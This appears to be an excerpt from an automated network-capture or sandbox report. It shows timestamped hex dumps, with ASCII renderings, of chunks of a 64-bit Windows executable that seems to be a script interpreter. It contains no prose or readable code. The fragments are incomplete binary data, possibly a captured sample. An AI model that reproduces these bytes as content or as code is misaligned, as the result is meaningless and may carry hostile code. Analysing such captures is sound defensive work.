cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b 42 08 49 8b f0 48 8b 48 08 48 8b 18 e8 8e 3b fa ff 48 8b cb 8b f8 e8 84 3b fa ff 48 8d 0d
                                                                  Data Ascii: MHL$ HYHCHHHpUHHU<LL$ HL?HHL$ FYH\$PHt$X3H@_@SH 3IH9BvHBH=uH#CHOH3H [H\$Ht$WH HBIHHH;H;H
                                                                  2022-07-15 01:58:15 UTC451INData Raw: f6 75 e3 32 c0 eb e4 cc cc cc cc cc cc cc cc cc 4c 8b c1 e9 18 7c ff ff cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 55 56 57 48 81 ec 80 00 00 00 83 48 18 ff 4c 8d 40 18 48 8b d9 e8 7f 0c fd ff 84 c0 0f 84 46 01 00 00 48 63 b4 24 b0 00 00 00 bf 07 00 00 00 3b f7 0f 8c 31 01 00 00 3b b1 60 13 00 00 0f 8f 25 01 00 00 48 8b ac f1 28 03 00 00 48 89 6c 24 20 80 7d 08 01 0f 85 ce 00 00 00 44 8d 47 45 48 8d 4c 24 34 33 d2 c7 44 24 30 50 00 00 00 e8 87 68 fa ff 48 8b 4d 00 4c 8d 4c 24 30 45 33 c0 8b d6 c7 44 24 34 04 00 00 00 ff 15 ab 6e 02 00 85 c0 0f 84 d2 00 00 00 39 bb 60 13 00 00 48 8b 44 24 48 0f 8c 81 00 00 00 48 8d b3 60 03 00 00 48 8b e8 48 8b 06 48 85 c0 74 55 48 39 28 75 50 80 78 08 01 8b d7 75 0a 48 8b cb e8 2b ff ff ff eb 3e 45 33 c0 48 8b cd ff 15
                                                                  Data Ascii: u2L|HHXUVWHHL@HFHc$;1;`%H(Hl$ }DGEHL$43D$0PhHMLL$0E3D$4n9`HD$HH`HHHtUH9(uPxuH+>E3H
                                                                  2022-07-15 01:58:15 UTC467INData Raw: b6 c5 45 33 f6 89 84 24 d8 00 00 00 83 4c 24 30 ff 48 8b 94 24 e8 00 00 00 44 8b cd 44 8b c0 48 8b ce 89 7c 24 28 4c 63 ef 44 89 7c 24 20 e8 3d a2 fd ff 4d 8b c5 48 8b d6 48 8d 4c 24 68 8b f8 3b 46 08 74 53 41 2b c5 4c 63 c8 e8 00 db ff ff 48 8d 54 24 68 48 8d 4c 24 48 e8 e1 fa f8 ff 48 8b 54 24 40 48 8d 4c 24 48 e8 d2 fa f8 ff 8b 84 24 d8 00 00 00 44 03 f5 41 03 ff 85 db 74 8d 44 3b f3 75 88 4c 8b 4e 08 4c 63 c7 48 8b d6 4d 2b c8 48 8d 4c 24 68 eb 06 41 2b fd 4c 63 cf e8 ad da ff ff 48 8d 54 24 68 48 8d 4c 24 48 e8 8e fa f8 ff 49 8b 04 24 45 33 c0 48 63 48 04 41 8b d6 49 03 cc e8 78 af f9 ff 4c 8b ac 24 e0 00 00 00 48 8d 54 24 48 49 8b cd e8 43 e4 f9 ff 48 8d 4c 24 48 e8 29 d9 f8 ff 48 8d 4c 24 68 e8 1f d9 f8 ff 48 8b 9c 24 d0 00 00 00 33 c0 48 81 c4 90
                                                                  Data Ascii: E3$L$0H$DDH|$(LcD|$ =MHHL$h;FtSA+LcHT$hHL$HHT$@HL$H$DAtD;uLNLcHM+HL$hA+LcHT$hHL$HI$E3HcHAIxL$HT$HICHL$H)HL$hH$3H
                                                                  2022-07-15 01:58:15 UTC483INData Raw: 84 c0 74 41 48 8b 43 08 48 63 54 24 38 48 8b 48 10 48 8b 78 08 48 8b 86 a0 02 00 00 48 8b 34 d0 e8 5b 7c f9 ff 48 8b cf 8b d8 e8 11 6d fd ff 48 8b 0e 48 8b 49 08 44 8b c3 48 8b d0 e8 ef a9 f9 ff 8a d0 eb 02 33 d2 48 8b cd e8 61 9a f9 ff 48 8b 5c 24 30 48 8b 6c 24 40 48 8b 74 24 48 33 c0 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 42 08 49 8b f8 48 8d 54 24 38 4c 8b 00 45 33 c9 48 8b d9 e8 7c 49 ff ff 84 c0 74 2f 48 8b 83 a0 02 00 00 48 63 4c 24 38 48 8b 0c c8 48 8b 01 48 8b 48 08 48 8b 59 18 48 8b cf e8 85 ed f8 ff c7 47 08 02 00 00 00 48 89 1f eb 26 48 8b 03 45 33 c0 48 63 48 04 48 03 cb 41 8d 58 01 8b d3 e8 c1 6f f9 ff 48 8b cf e8 59 ed f8 ff 83 27 00 89 5f 08 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc
                                                                  Data Ascii: tAHCHcT$8HHHxHH4[|HmHHIDH3HaH\$0Hl$@Ht$H3H _H\$WH HBIHT$8LE3H|It/HHcL$8HHHHHYHGH&HE3HcHHAXoHY'_3H\$0H _
                                                                  2022-07-15 01:58:15 UTC499INData Raw: 48 89 5c 24 08 48 89 74 24 18 57 48 83 ec 40 48 8b 42 08 48 8b d9 49 8b f0 48 8b 48 08 48 8b fa e8 3b 55 fe ff 85 c0 74 65 48 8b 47 08 48 8b 48 08 e8 5a 55 fe ff 4c 8d 4c 24 30 4c 8d 44 24 34 48 8b d0 48 8d 44 24 58 48 8b cb 48 89 44 24 28 48 8d 44 24 68 48 89 44 24 20 e8 71 9e ff ff 84 c0 75 2b 48 8b ce e8 d5 ad f8 ff 83 26 00 bf 01 00 00 00 89 7e 08 48 8b 0b 45 33 c0 48 63 49 04 8b d7 48 03 cb e8 16 30 f9 ff 8b c7 eb 42 48 8b 47 08 48 8b 48 08 48 8b 18 e8 c2 4c f9 ff 48 8b cb 48 8b f8 e8 d7 3b f9 ff 48 8d 0d c0 9e 04 00 8b d0 4c 8b c7 e8 56 5c fe ff 48 8b ce 8b d8 e8 7c ad f8 ff bf 01 00 00 00 89 1e 33 c0 89 7e 08 48 8b 5c 24 50 48 8b 74 24 60 48 83 c4 40 5f c3 4d 8b c8 4c 8b c2 ba 01 00 00 00 e9 d0 79 ff ff 4d 8b c8 4c 8b c2 33 d2 e9 c3 79 ff ff cc cc
                                                                  Data Ascii: H\$Ht$WH@HBHIHHH;UteHGHHZULL$0LD$4HHD$XHHD$(HD$hHD$ qu+H&~HE3HcIH0BHGHHHLHH;HLV\H|3~H\$PHt$`H@_MLyML3y
                                                                  2022-07-15 01:58:15 UTC515INData Raw: f9 ff 48 8d 54 24 20 4c 8b c3 48 8b cf e8 8e 96 fd ff 33 db 3a c3 74 0f 48 8d 54 24 20 48 8b ce e8 bb 9e ff ff b3 01 48 8d 4c 24 20 e8 df 19 f8 ff 48 8b 74 24 58 8a c3 48 8b 5c 24 50 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 f6 41 44 01 75 1a f6 41 44 02 75 14 f6 41 44 04 74 07 e8 75 9d ff ff eb 0c e8 6e ff ff ff eb 05 e8 17 ff fe ff 48 83 c4 28 c3 cc cc 48 8b c4 48 89 58 08 48 89 68 18 48 89 70 20 57 41 54 41 55 41 56 41 57 48 83 ec 60 4c 8b f1 48 8d 48 98 49 8b e8 48 8b fa e8 a2 f0 f8 ff 48 8d 15 0b aa 01 00 33 db 48 8b cd 45 33 ed 89 9c 24 98 00 00 00 e8 17 fb f8 ff 48 8b 77 08 44 8d 7b 01 85 f6 0f 8e 1b 01 00 00 4c 63 e3 48 8b cf 49 8b d4 e8 99 27 fc ff 66 83 38 5c 0f 85 9f 00 00 00 41 03 df 89 9c 24 98 00 00 00 3b de 0f 84
                                                                  Data Ascii: HT$ LH3:tHT$ HHL$ Ht$XH\$PH@_H(ADuADuADtunH(HHXHhHp WATAUAVAWH`LHHIHH3HE3$HwD{LcHI'f8\A$;
                                                                  2022-07-15 01:58:15 UTC531INData Raw: 48 8b cd e8 38 2e f8 ff c7 45 00 09 00 00 00 e9 0e 05 00 00 48 8b cd e8 24 2e f8 ff c7 45 00 05 00 00 00 e9 fa 04 00 00 48 8b cd e8 10 2e f8 ff c7 45 00 0a 00 00 00 e9 e6 04 00 00 48 8b cd e8 fc 2d f8 ff c7 45 00 02 00 00 00 e9 d2 04 00 00 48 8b cd e8 e8 2d f8 ff c7 45 00 07 00 00 00 e9 be 04 00 00 48 8b cd e8 d4 2d f8 ff c7 45 00 08 00 00 00 e9 aa 04 00 00 48 8b cd e8 c0 2d f8 ff c7 45 00 04 00 00 00 e9 96 04 00 00 44 38 25 07 08 03 00 48 8b cd 0f 84 7d 04 00 00 e9 29 ff ff ff 44 38 25 d5 1e 04 00 eb e9 48 8b cd e8 8e 2d f8 ff c7 45 00 40 00 00 00 e9 64 04 00 00 48 8b cd e8 7a 2d f8 ff c7 45 00 41 00 00 00 e9 50 04 00 00 48 8b cd e8 66 2d f8 ff c7 45 00 42 00 00 00 e9 3c 04 00 00 48 8b cd e8 52 2d f8 ff c7 45 00 43 00 00 00 e9 28 04 00 00 48 8b 93 70 01
                                                                  Data Ascii: H8.EH$.EH.EH-EH-EH-EH-ED8%H})D8%H-E@dHz-EAPHf-EB<HR-EC(Hp
                                                                  2022-07-15 01:58:15 UTC547INData Raw: 8b 74 24 70 33 c0 48 83 c4 40 41 5d 41 5c 5f c3 40 53 48 83 ec 70 33 c9 0f 29 74 24 60 49 8b d8 ff 15 92 e6 00 00 48 8d 4c 24 20 c7 44 24 20 40 00 00 00 ff 15 2f e9 00 00 ba 01 00 00 00 48 8b cb 44 8d 42 06 e8 f6 9e f8 ff 44 8b 5c 24 24 33 d2 48 8b cb 66 0f ef d2 f2 49 0f 2a d3 e8 fe f5 ff ff f2 0f 10 35 ae b0 01 00 ba 01 00 00 00 48 8b cb 66 0f ef d2 f2 48 0f 2a 54 24 28 f2 0f 59 d6 e8 da f5 ff ff ba 02 00 00 00 48 8b cb 66 0f ef d2 f2 48 0f 2a 54 24 30 f2 0f 59 d6 e8 be f5 ff ff ba 03 00 00 00 48 8b cb 66 0f ef d2 f2 48 0f 2a 54 24 38 f2 0f 59 d6 e8 a2 f5 ff ff ba 04 00 00 00 48 8b cb 66 0f ef d2 f2 48 0f 2a 54 24 40 f2 0f 59 d6 e8 86 f5 ff ff ba 05 00 00 00 48 8b cb 66 0f ef d2 f2 48 0f 2a 54 24 48 f2 0f 59 d6 e8 6a f5 ff ff ba 06 00 00 00 48 8b cb 66
                                                                  Data Ascii: t$p3H@A]A\_@SHp3)t$`IHL$ D$ @/HDBD\$$3HfI*5HfH*T$(YHfH*T$0YHfH*T$8YHfH*T$@YHfH*T$HYjHf
                                                                  2022-07-15 01:58:15 UTC563INData Raw: 01 48 8b ce e8 e7 49 ff ff 85 c0 7f 2f 79 16 48 8b 0e f7 d8 45 33 c0 48 63 49 04 8b d0 48 03 ce e8 7b 30 f8 ff 48 8b cf e8 13 ae f7 ff 83 27 00 c7 47 08 01 00 00 00 e9 87 00 00 00 48 8b 86 50 03 00 00 48 8b 18 ff 15 cc b1 00 00 48 3b d8 75 0b 8b 8e 2c 05 00 00 e8 34 39 fb ff 48 8b 86 50 03 00 00 48 8b 0d 46 bc 03 00 48 8b 10 e8 5e 4f fb ff 48 8b cf 8b e8 85 c0 75 10 e8 c0 ad f7 ff 21 2f c7 47 08 01 00 00 00 eb 2d 48 8b 86 50 03 00 00 48 8b 18 e8 a6 ad f7 ff c7 47 08 07 00 00 00 48 89 1f 48 8b 06 45 33 c0 48 63 48 04 8b d5 48 03 ce e8 88 2f f8 ff 8b 8e 2c 05 00 00 e8 cd 38 fb ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 33 c0 48 83 c4 20 5f c3 cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 49 8b d8 48 8b f9 e8 4b 78 ff ff 48 8b cf e8 83 53 ff ff 85 c0
                                                                  Data Ascii: HI/yHE3HcIH{0H'GHPHH;u,49HPHFH^OHu!/G-HPHGHHE3HcHH/,8H\$0Hl$8Ht$@3H _H\$WH IHKxHS
                                                                  2022-07-15 01:58:15 UTC579INData Raw: d6 e8 1a c7 fa ff 44 38 b6 a4 02 00 00 74 1d 83 be 9c 02 00 00 ff 74 08 8a 86 9c 02 00 00 eb 06 8a 86 98 02 00 00 88 85 f7 00 00 00 44 8b 86 80 00 00 00 41 83 f8 ff 74 0f 48 8d 0d c0 5d 03 00 41 8b d5 e8 58 5e fc ff 44 8b 86 84 00 00 00 41 83 f8 ff 74 0f 48 8d 0d a4 5d 03 00 41 8b d5 e8 1c 5b fc ff 45 8b f5 48 8b 8c 24 08 01 00 00 e8 cc 6d f7 ff 41 8b c6 48 8b 9c 24 d0 00 00 00 48 81 c4 80 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 6c 24 08 48 89 74 24 10 48 89 7c 24 18 41 54 48 83 ec 30 48 83 7c 24 60 00 49 8b f9 49 8b f0 48 8b ea 4c 8b e1 74 32 48 8b 4c 24 60 48 8d 15 eb a9 00 00 e8 a6 20 f8 ff 4c 8b 44 24 60 ba 03 00 00 00 4c 8b cd 49 8b cc 48 89 7c 24 28 48 89 74 24 20 e8 67 da ff ff eb 05 b8 01 00 00
                                                                  Data Ascii: D8ttDAtH]AX^DAtH]A[EH$mAH$HA_A^A]A\_^]Hl$Ht$H|$ATH0H|$`IIHLt2HL$`H LD$`LIH|$(Ht$ g
                                                                  2022-07-15 01:58:15 UTC595INData Raw: 24 50 49 83 63 b0 00 49 8d 4b 88 49 8b d1 49 89 43 d0 49 8b f8 4c 8d 25 a4 6a 00 00 e8 cf 2e f7 ff 8b 0f 48 8b 46 08 48 8b 0c c8 66 83 79 08 48 74 31 48 8d 4c 24 78 e8 d4 d4 fe ff 44 8b 1f 48 8b 46 08 4a 8b 04 d8 66 83 78 08 47 75 0f 41 8d 43 ff 4c 8d 25 67 6a 00 00 89 07 eb 06 48 8b 00 4c 8b 20 8b 17 48 8b 46 08 ff c2 48 8b 0c d0 66 83 79 08 47 75 1d 4c 8d 4c 24 78 4c 8b c7 48 8b d6 48 8b cd e8 e7 32 ff ff 85 c0 0f 85 5e 01 00 00 eb 02 89 17 8b 0f 48 8b 46 08 48 8b 0c c8 66 83 79 08 41 48 8b cd 0f 84 dc 00 00 00 48 8d 44 24 48 4c 8d 4c 24 78 48 8d 54 24 30 4d 8b c4 48 89 44 24 20 e8 d7 bf ff ff 85 c0 0f 85 1e 01 00 00 48 8d 4c 24 30 e8 65 2d f7 ff 83 64 24 30 00 48 8d 4c 24 48 89 5c 24 38 e8 32 a8 fa ff 84 c0 74 68 48 8d 54 24 48 48 8d 4c 24 30 e8 ef 2d
                                                                  Data Ascii: $PIcIKIICIL%j.HFHfyHt1HL$xDHFJfxGuACL%gjHL HFHfyGuLL$xLHH2^HFHfyAHHD$HLL$xHT$0MHD$ HL$0e-d$0HL$H\$82thHT$HHL$0-
                                                                  2022-07-15 01:58:15 UTC611INData Raw: 00 00 00 00 00 00 00 00 00 00 00 80 96 e7 96 3f 00 00 00 60 d3 ba a6 3f 00 00 00 80 38 eb b0 3f 00 00 00 e0 f6 63 b6 3f 00 00 00 40 42 c8 bb 3f 00 00 00 80 58 8c c0 3f 00 00 00 e0 e9 2a c3 3f 00 00 00 20 1a c0 c5 3f 00 00 00 c0 2b 4c c8 3f 00 00 00 20 5e cf ca 3f 00 00 00 40 ee 49 cd 3f 00 00 00 a0 16 bc cf 3f 00 00 00 c0 07 13 d1 3f 00 00 00 a0 07 44 d2 3f 00 00 00 c0 24 71 d3 3f 00 00 00 40 78 9a d4 3f 00 00 00 20 1a c0 d5 3f 00 00 00 c0 21 e2 d6 3f 00 00 00 60 a5 00 d8 3f 00 00 00 80 ba 1b d9 3f 00 00 00 00 76 33 da 3f 00 00 00 e0 eb 47 db 3f 00 00 00 a0 2f 59 dc 3f 00 00 00 e0 53 67 dd 3f 00 00 00 a0 6a 72 de 3f 00 00 00 60 85 7a df 3f 00 00 00 80 da 3f e0 3f 00 00 00 00 05 c1 e0 3f 00 00 00 e0 c9 40 e1 3f 00 00 00 00 31 bf e1 3f 00 00 00 c0 41 3c e2
                                                                  Data Ascii: ?`?8?c?@B?X?*? ?+L? ^?@I???D?$q?@x? ?!?`??v3?G?/Y?Sg?jr?`z????@?1?A<
                                                                  2022-07-15 01:58:15 UTC627INData Raw: 03 00 0e 00 d0 01 03 00 0f 00 d3 01 04 00 28 00 d9 01 04 00 48 00 e2 01 04 00 29 00 ed 01 04 00 2a 00 f9 01 04 00 2b 00 ff 01 04 00 2c 00 07 02 02 00 04 00 09 02 03 00 10 00 0c 02 03 00 11 00 0f 02 03 00 12 00 12 02 03 00 13 00 15 02 04 00 40 00 1e 02 04 00 41 00 29 02 03 00 14 00 2c 02 03 00 15 00 2f 02 03 00 16 00 32 02 04 00 49 00 39 02 04 00 2d 00 3f 02 02 00 05 00 41 02 04 00 4a 00 4c 02 03 00 17 00 4f 02 04 00 2e 00 57 02 04 00 2f 00 5f 02 03 00 18 00 62 02 03 00 19 00 65 02 03 00 1a 00 68 02 04 00 4b 00 72 02 04 00 30 00 7f 02 04 00 31 00 86 02 04 00 32 00 8e 02 04 00 33 00 97 02 04 00 34 00 9e 02 04 00 35 00 a4 02 04 00 36 00 ab 02 04 00 37 00 b2 02 04 00 38 00 b7 02 04 00 39 00 bf 02 04 00 3a 00 c8 02 04 00 3b 00 d1 02 04 00 4c 00 d5 02 04 00 3c
                                                                  Data Ascii: (H)*+,@A),/2I9-?AJLO.W/_behKr0123456789:;L<
                                                                  2022-07-15 01:58:15 UTC643INData Raw: 48 00 4f 00 57 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 53 00 45 00 54 00 54 00 45 00 58 00 54 00 00 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 53 00 45 00 4e 00 44 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 4d 00 4f 00 56 00 45 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 4c 00 49 00 53 00 54 00 56 00 49 00 45 00 57 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 48 00 49 00 44 00 45 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 47 00 45 00 54 00 54 00 45 00 58 00 54 00 00 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 47 00 45 00 54 00 50 00 4f 00 53 00 00 00 00 00 00 00 43 00 4f 00 4e 00 54 00 52 00 4f 00 4c 00 47 00 45 00 54 00 48 00 41 00 4e 00 44 00 4c 00 45 00 00 00 00 00 00 00 00 00 43 00 4f 00 4e 00 54
                                                                  Data Ascii: HOWCONTROLSETTEXTCONTROLSENDCONTROLMOVECONTROLLISTVIEWCONTROLHIDECONTROLGETTEXTCONTROLGETPOSCONTROLGETHANDLECONT
                                                                  2022-07-15 01:58:15 UTC659INData Raw: 06 50 00 00 01 15 09 00 15 74 05 00 15 64 04 00 15 54 03 00 15 34 02 00 15 c0 00 00 01 13 08 00 13 74 04 00 0f 64 03 00 0b 54 02 00 07 34 01 00 01 12 07 00 12 64 55 01 12 34 54 01 12 01 52 01 0b 70 00 00 01 09 03 00 09 01 46 00 02 30 00 00 21 00 00 00 60 43 01 00 62 44 01 00 60 50 0a 00 01 13 05 00 13 34 0a 20 13 01 08 20 06 70 00 00 01 0a 04 00 0a 34 07 00 0a 32 06 70 01 0a 04 00 0a 34 06 00 0a 32 06 70 21 00 00 00 30 2e 01 00 8e 2e 01 00 cc 50 0a 00 21 00 04 00 00 c4 0a 00 00 64 09 00 30 2e 01 00 8e 2e 01 00 cc 50 0a 00 21 14 06 00 14 c4 0a 00 0f 64 09 00 05 54 08 00 30 2e 01 00 8e 2e 01 00 cc 50 0a 00 01 0a 04 00 0a 34 0b 00 0a 52 06 70 21 0f 04 00 0f 64 0b 00 0f 54 0a 00 70 44 01 00 c3 44 01 00 18 51 0a 00 21 00 00 00 70 44 01 00 c3 44 01 00 18 51 0a
                                                                  Data Ascii: PtdT4tdT4dU4TRpF0!`CbD`P4 p42p42p!0..P!d0..P!dT0..P4Rp!dTpDDQ!pDDQ
                                                                  2022-07-15 01:58:15 UTC675INData Raw: 28 90 0a 00 21 28 0a 00 28 d4 2b 00 20 c4 2c 00 18 64 2d 00 10 54 2e 00 08 34 2f 00 e0 72 00 00 25 73 00 00 28 90 0a 00 01 0c 03 00 0c 01 30 00 05 70 00 00 21 00 00 00 a0 1a 01 00 03 1b 01 00 7c 50 0a 00 01 0c 04 00 0c 34 0c 00 0c 92 08 70 21 00 00 00 a0 3c 01 00 5d 3d 01 00 6c 58 0a 00 21 00 00 00 c0 3d 01 00 d9 3d 01 00 8c 5a 0a 00 21 0c 04 00 0c 74 04 00 05 34 06 00 c0 3d 01 00 d9 3d 01 00 8c 5a 0a 00 21 3d 04 00 3d 74 91 00 3d 34 90 00 f0 21 01 00 37 22 01 00 c8 90 0a 00 21 00 00 00 f0 21 01 00 37 22 01 00 c8 90 0a 00 21 10 04 00 10 74 91 00 08 34 90 00 f0 21 01 00 37 22 01 00 c8 90 0a 00 01 09 03 00 09 01 8e 00 02 60 00 00 21 00 00 00 d0 20 01 00 e8 20 01 00 1c 91 0a 00 21 00 00 00 e8 20 01 00 f3 20 01 00 08 91 0a 00 21 04 02 00 04 74 0e 00 e8 20 01
                                                                  Data Ascii: (!((+ ,d-T.4/r%s(0p!|P4p!<]=lX!==Z!t4==Z!==t=4!7"!!7"!t4!7"`! ! !t
                                                                  2022-07-15 01:58:15 UTC691INData Raw: 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d4 0a 40 01 00 00 00 01 02 04 08 00 00 00 00 a4 03 00 00 60 82 79 82 21 00 00 00 00 00 00 00 a6 df 00 00 00 00 00 00 a1 a5 00 00 00 00 00 00 81 9f e0 fc 00 00 00 00 40 7e 80 fc 00 00 00 00 a8 03 00 00 c1 a3 da a3 20 00 00 00 00 00 00
                                                                  Data Ascii: pqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@`y!@~
                                                                  2022-07-15 01:58:15 UTC707INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  2022-07-15 01:58:15 UTC723INData Raw: 7e 40 01 00 84 40 01 00 10 4f 0a 00 90 40 01 00 a6 40 01 00 8c 5a 0a 00 b0 40 01 00 d0 40 01 00 90 7d 0a 00 d0 40 01 00 f0 40 01 00 90 7d 0a 00 f0 40 01 00 19 41 01 00 f8 3e 0a 00 20 41 01 00 dc 41 01 00 8c 5a 0a 00 e0 41 01 00 20 42 01 00 f8 3e 0a 00 20 42 01 00 3b 42 01 00 8c 5a 0a 00 50 42 01 00 74 42 01 00 a4 68 0a 00 80 42 01 00 bd 42 01 00 54 8c 0a 00 d0 42 01 00 54 43 01 00 4c 87 0a 00 60 43 01 00 62 44 01 00 60 50 0a 00 70 44 01 00 c3 44 01 00 18 51 0a 00 c3 44 01 00 13 45 01 00 00 51 0a 00 13 45 01 00 24 45 01 00 f0 50 0a 00 30 45 01 00 16 46 01 00 74 75 0a 00 20 46 01 00 5a 46 01 00 f8 3e 0a 00 b0 46 01 00 fd 46 01 00 6c 58 0a 00 00 47 01 00 ed 47 01 00 c4 68 0a 00 f0 47 01 00 98 48 01 00 c4 6d 0a 00 a0 48 01 00 d0 50 01 00 64 5d 0a 00 20 51 01
                                                                  Data Ascii: ~@@O@@Z@@}@@}@A> AAZA B> B;BZPBtBhBBTBTCL`CbD`PpDDQDEQE$EP0EFtu FZF>FFlXGGhGHmHPd] Q
                                                                  2022-07-15 01:58:15 UTC728INData Raw: e0 19 03 00 b8 1a 03 00 04 58 0a 00 c0 1a 03 00 4f 1b 03 00 14 58 0a 00 70 1b 03 00 52 1c 03 00 24 58 0a 00 60 1c 03 00 6b 1c 03 00 4c 58 0a 00 70 1c 03 00 77 1c 03 00 5c 58 0a 00 80 1c 03 00 01 1d 03 00 90 58 0a 00 10 1d 03 00 bf 1d 03 00 a0 58 0a 00 c0 1d 03 00 73 1e 03 00 ec 58 0a 00 73 1e 03 00 c6 1e 03 00 d4 58 0a 00 c6 1e 03 00 e6 1e 03 00 c0 58 0a 00 e6 1e 03 00 f6 1e 03 00 b0 58 0a 00 00 1f 03 00 07 1f 03 00 34 59 0a 00 10 1f 03 00 5f 1f 03 00 f4 59 0a 00 5f 1f 03 00 52 20 03 00 e0 59 0a 00 52 20 03 00 66 20 03 00 d0 59 0a 00 70 20 03 00 78 20 03 00 10 5a 0a 00 80 20 03 00 8c 20 03 00 20 5a 0a 00 90 20 03 00 97 20 03 00 58 5a 0a 00 a0 20 03 00 ac 20 03 00 dc 5a 0a 00 b0 20 03 00 b9 20 03 00 ec 5a 0a 00 c0 20 03 00 d7 20 03 00 fc 5a 0a 00 e0 20 03
                                                                  Data Ascii: XOXpR$X`kLXpw\XXXsXsXXX4Y_Y_R YR f Yp x Z Z XZ Z Z Z
                                                                  2022-07-15 01:58:15 UTC744INData Raw: 7c fe 08 00 30 77 0a 00 80 fe 08 00 d9 ff 08 00 58 88 0a 00 e0 ff 08 00 92 0c 09 00 70 88 0a 00 a0 0c 09 00 16 0d 09 00 80 89 0a 00 20 0d 09 00 8c 0d 09 00 54 8c 0a 00 90 0d 09 00 ec 0e 09 00 28 72 0a 00 f0 0e 09 00 6a 12 09 00 94 89 0a 00 40 14 09 00 d1 1e 09 00 d0 89 0a 00 e0 1e 09 00 e2 1f 09 00 ec 89 0a 00 f0 1f 09 00 2a 25 09 00 08 8a 0a 00 30 25 09 00 ab 26 09 00 b4 83 0a 00 b0 26 09 00 ca 27 09 00 f0 5b 0a 00 d0 27 09 00 80 2a 09 00 24 8a 0a 00 80 2a 09 00 99 2b 09 00 40 8a 0a 00 b0 2b 09 00 73 2e 09 00 68 6f 0a 00 80 2e 09 00 1e 30 09 00 50 8a 0a 00 20 30 09 00 c7 32 09 00 6c 8a 0a 00 d0 32 09 00 a7 33 09 00 c4 6d 0a 00 b0 33 09 00 0a 35 09 00 24 8b 0a 00 10 35 09 00 f4 36 09 00 38 8b 0a 00 00 37 09 00 7b 39 09 00 58 8b 0a 00 a0 39 09 00 ae 3f 09
                                                                  Data Ascii: |0wXp T(rj@*%0%&&'['*$*+@+s.ho.0P 02l23m35$5687{9X9?
                                                                  2022-07-15 01:58:15 UTC760INData Raw: 59 47 00 ca 2c 3f b7 fc be d3 1d 89 37 a7 95 1f a9 09 3f d6 ac 3e 01 70 b5 a2 63 28 a9 91 ca 8d c0 7f 64 27 36 b5 c4 70 ca b2 06 a6 fe 55 ca f4 de 85 ea 9f ee f5 57 d8 ee 3f 19 41 4e 56 61 62 49 28 db fb ab ea 2f 2a ea cf 7b fd f9 b8 f7 e7 ea ef 61 ea 7f 44 c6 ae c8 06 cd 3a d1 a8 f7 3f 82 1b 2e 68 fe de 17 de 5b 59 ed fe b3 9a 00 7e f5 d0 ee db ee fb c3 ce 1f a4 e7 f6 e3 24 c0 09 c0 c2 d4 ff 92 8b ce c0 b3 ed c9 82 c1 3f 14 f5 f7 1c 41 a2 fb 65 fc 03 53 7f ee fd 6b ab d5 89 3e b8 f7 b7 5a 4d ea 68 3f a6 ec c7 7d c7 f6 fe 13 1d e4 33 85 0c 2a 39 3b e0 ea af f4 fa 93 46 bd 3f 6f f7 0f 29 ed fe e1 51 f5 3f 72 32 e2 b0 97 f6 fe 49 a6 fe 77 55 b6 fa cf 2a 02 60 ea 6f 3f e7 63 bf 3d 1c 4c a0 3e bb f0 07 9d 01 eb d6 2c 45 d8 d4 8c 6e 8f 86 fa 87 bc 8a fa 9f b9
                                                                  Data Ascii: YG,?7?>pc(d'6pUW?ANVabI(/*{aD:?.h[Y~$?AeSk>ZMh?}3*9;F?o)Q?r2IwU*`o?c=L>,En
